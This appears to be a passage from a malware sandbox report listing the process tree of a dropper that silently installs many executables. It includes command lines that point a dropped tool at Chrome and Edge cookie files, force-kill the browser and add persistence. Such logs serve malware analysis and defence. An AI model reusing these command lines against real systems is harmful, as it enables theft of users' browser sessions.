                                                                                                  • Program crash
                                                                                                  PID:416
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1428
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:7304
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 920
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Program crash
                                                                                                  PID:7020
                                                                                              • C:\Users\Admin\Documents\M1DiV6MRo__pjXmjHY12jEWV.exe
                                                                                                "C:\Users\Admin\Documents\M1DiV6MRo__pjXmjHY12jEWV.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:2760
                                                                                              • C:\Users\Admin\Documents\5QWYonomO_gthFk55eOCU8GE.exe
                                                                                                "C:\Users\Admin\Documents\5QWYonomO_gthFk55eOCU8GE.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1256
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 664
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:3940
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 676
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5336
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 680
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5748
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 724
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6136
                                                                                              • C:\Users\Admin\Documents\3GTLxwXN8cbLmV6qqA6d73mP.exe
                                                                                                "C:\Users\Admin\Documents\3GTLxwXN8cbLmV6qqA6d73mP.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3416
                                                                                              • C:\Users\Admin\Documents\plZk1qE2dbiGZCmF0WRBgHWn.exe
                                                                                                "C:\Users\Admin\Documents\plZk1qE2dbiGZCmF0WRBgHWn.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:496
                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:4408
                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4380
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                      PID:4636
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5380
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      4⤵
                                                                                                        PID:9536
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4464
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:636
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5368
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4580
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5580
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 4464 -s 1288
                                                                                                        4⤵
                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                        • Program crash
                                                                                                        PID:2188
                                                                                                  • C:\Users\Admin\Documents\PJG_pRFsRwbNDJ7WT80cNEHj.exe
                                                                                                    "C:\Users\Admin\Documents\PJG_pRFsRwbNDJ7WT80cNEHj.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2956
                                                                                                    • C:\Users\Admin\Documents\PJG_pRFsRwbNDJ7WT80cNEHj.exe
                                                                                                      "C:\Users\Admin\Documents\PJG_pRFsRwbNDJ7WT80cNEHj.exe" -q
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5000
                                                                                                  • C:\Users\Admin\Documents\5dlbGoLGUnI2kOL38E0Hs4n8.exe
                                                                                                    "C:\Users\Admin\Documents\5dlbGoLGUnI2kOL38E0Hs4n8.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4140
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-OEOKR.tmp\5dlbGoLGUnI2kOL38E0Hs4n8.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-OEOKR.tmp\5dlbGoLGUnI2kOL38E0Hs4n8.tmp" /SL5="$10268,138429,56832,C:\Users\Admin\Documents\5dlbGoLGUnI2kOL38E0Hs4n8.exe"
                                                                                                      3⤵
                                                                                                        PID:4368
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-09TFK.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-09TFK.tmp\Setup.exe" /Verysilent
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:1576
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4700
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 760
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:5840
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 812
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:5604
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 784
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6944
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 824
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6692
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 956
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6956
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 992
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6940
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 1440
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:7724
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 1508
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:7708
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:580
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282275 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                              6⤵
                                                                                                                PID:8128
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4880
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-G7K7Q.tmp\WEATHER Manager.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-G7K7Q.tmp\WEATHER Manager.tmp" /SL5="$102D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:3944
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KIHHE.tmp\Setup.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KIHHE.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Modifies system certificate store
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:2152
                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-KIHHE.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-KIHHE.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282275 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                    8⤵
                                                                                                                      PID:8384
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:3540
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2424
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-QUVIR.tmp\MediaBurner2.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-QUVIR.tmp\MediaBurner2.tmp" /SL5="$302C8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5132
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-N8E2H.tmp\3377047_logo_media.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-N8E2H.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                    7⤵
                                                                                                                    • Drops file in Drivers directory
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:6104
                                                                                                                    • C:\Program Files\Windows Media Player\VHQPQREKDZ\ultramediaburner.exe
                                                                                                                      "C:\Program Files\Windows Media Player\VHQPQREKDZ\ultramediaburner.exe" /VERYSILENT
                                                                                                                      8⤵
                                                                                                                        PID:6868
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-A6VN2.tmp\ultramediaburner.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-A6VN2.tmp\ultramediaburner.tmp" /SL5="$30386,281924,62464,C:\Program Files\Windows Media Player\VHQPQREKDZ\ultramediaburner.exe" /VERYSILENT
                                                                                                                          9⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          PID:4616
                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                            10⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:3204
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\57-23d66-b70-5e88a-4aca457c25aac\Henekysybu.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\57-23d66-b70-5e88a-4aca457c25aac\Henekysybu.exe"
                                                                                                                        8⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        PID:6464
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2a-3ed3f-968-173ad-099522d2683f9\SHulunasoke.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2a-3ed3f-968-173ad-099522d2683f9\SHulunasoke.exe"
                                                                                                                        8⤵
                                                                                                                          PID:3356
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0pvivn0.kxk\GcleanerEU.exe /eufive & exit
                                                                                                                            9⤵
                                                                                                                              PID:8404
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\i0pvivn0.kxk\GcleanerEU.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\i0pvivn0.kxk\GcleanerEU.exe /eufive
                                                                                                                                10⤵
                                                                                                                                  PID:9040
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xye2a0vi.h1t\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                9⤵
                                                                                                                                  PID:8592
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xye2a0vi.h1t\installer.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\xye2a0vi.h1t\installer.exe /qn CAMPAIGN="654"
                                                                                                                                    10⤵
                                                                                                                                      PID:8564
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otktejvf.fvl\ufgaa.exe & exit
                                                                                                                                    9⤵
                                                                                                                                      PID:6916
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k32gqwzg.4mn\anyname.exe & exit
                                                                                                                                      9⤵
                                                                                                                                        PID:4228
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\k32gqwzg.4mn\anyname.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\k32gqwzg.4mn\anyname.exe
                                                                                                                                          10⤵
                                                                                                                                            PID:9088
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\k32gqwzg.4mn\anyname.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\k32gqwzg.4mn\anyname.exe" -q
                                                                                                                                              11⤵
                                                                                                                                                PID:6244
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  12⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:8784
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxve02jk.5v4\gcleaner.exe /mixfive & exit
                                                                                                                                            9⤵
                                                                                                                                              PID:6168
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\wxve02jk.5v4\gcleaner.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\wxve02jk.5v4\gcleaner.exe /mixfive
                                                                                                                                                10⤵
                                                                                                                                                  PID:8588
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuakctws.kzd\autosubplayer.exe /S & exit
                                                                                                                                                9⤵
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:3640
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5076
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                          6⤵
                                                                                                                                            PID:7264
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                              7⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6448
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                          5⤵
                                                                                                                                            PID:4616
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LC516.tmp\VPN.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LC516.tmp\VPN.tmp" /SL5="$102DA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                              6⤵
                                                                                                                                                PID:4416
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-19DSL.tmp\Setup.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-19DSL.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                  7⤵
                                                                                                                                                    PID:7148
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-BG0DS.tmp\Setup.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-BG0DS.tmp\Setup.tmp" /SL5="$50246,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-19DSL.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                      8⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      PID:5096
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                        9⤵
                                                                                                                                                          PID:7200
                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                            10⤵
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            PID:7628
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                          9⤵
                                                                                                                                                            PID:2656
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                              10⤵
                                                                                                                                                                PID:7680
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                              9⤵
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              PID:4540
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                              9⤵
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              PID:4032
                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3116
                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:3948
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6377752.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6377752.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4884
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8497719.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8497719.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                        PID:4256
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4039385.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4039385.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3476
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3760454.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3760454.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4428
                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      PID:5008
                                                                                                                                                      • C:\Users\Admin\Documents\Fk791KAACcWyLQeXyEthXe3i.exe
                                                                                                                                                        "C:\Users\Admin\Documents\Fk791KAACcWyLQeXyEthXe3i.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6164
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 824
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:8044
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 956
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7364
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 984
                                                                                                                                                            7⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5172
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1020
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5628
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1344
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7708
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1260
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7504
                                                                                                                                                        • C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe
                                                                                                                                                          "C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6156
                                                                                                                                                            • C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe
                                                                                                                                                              C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe
                                                                                                                                                              7⤵
                                                                                                                                                                PID:6652
                                                                                                                                                              • C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe
                                                                                                                                                                C:\Users\Admin\Documents\Id7E8trnM3OhXXZC7XHpt38b.exe
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:7076
                                                                                                                                                              • C:\Users\Admin\Documents\0kmZEyHD1gK_p0PJ4rA1sEPI.exe
                                                                                                                                                                "C:\Users\Admin\Documents\0kmZEyHD1gK_p0PJ4rA1sEPI.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6148
                                                                                                                                                                  • C:\Users\Admin\Documents\0kmZEyHD1gK_p0PJ4rA1sEPI.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\0kmZEyHD1gK_p0PJ4rA1sEPI.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:5468
                                                                                                                                                                • C:\Users\Admin\Documents\_2vPK9ybUONto5y7IH023YyC.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\_2vPK9ybUONto5y7IH023YyC.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:3352
                                                                                                                                                                • C:\Users\Admin\Documents\q6TXjcO9wS8udli5gT4BdpzY.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\q6TXjcO9wS8udli5gT4BdpzY.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:5992
                                                                                                                                                                • C:\Users\Admin\Documents\e7_V0PtR_s6P00xWNZkPsvLq.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\e7_V0PtR_s6P00xWNZkPsvLq.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4560
                                                                                                                                                                  • C:\Users\Admin\Documents\DcOTUuE1uvNs44H1goUVzwcU.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\DcOTUuE1uvNs44H1goUVzwcU.exe"
                                                                                                                                                                    6⤵
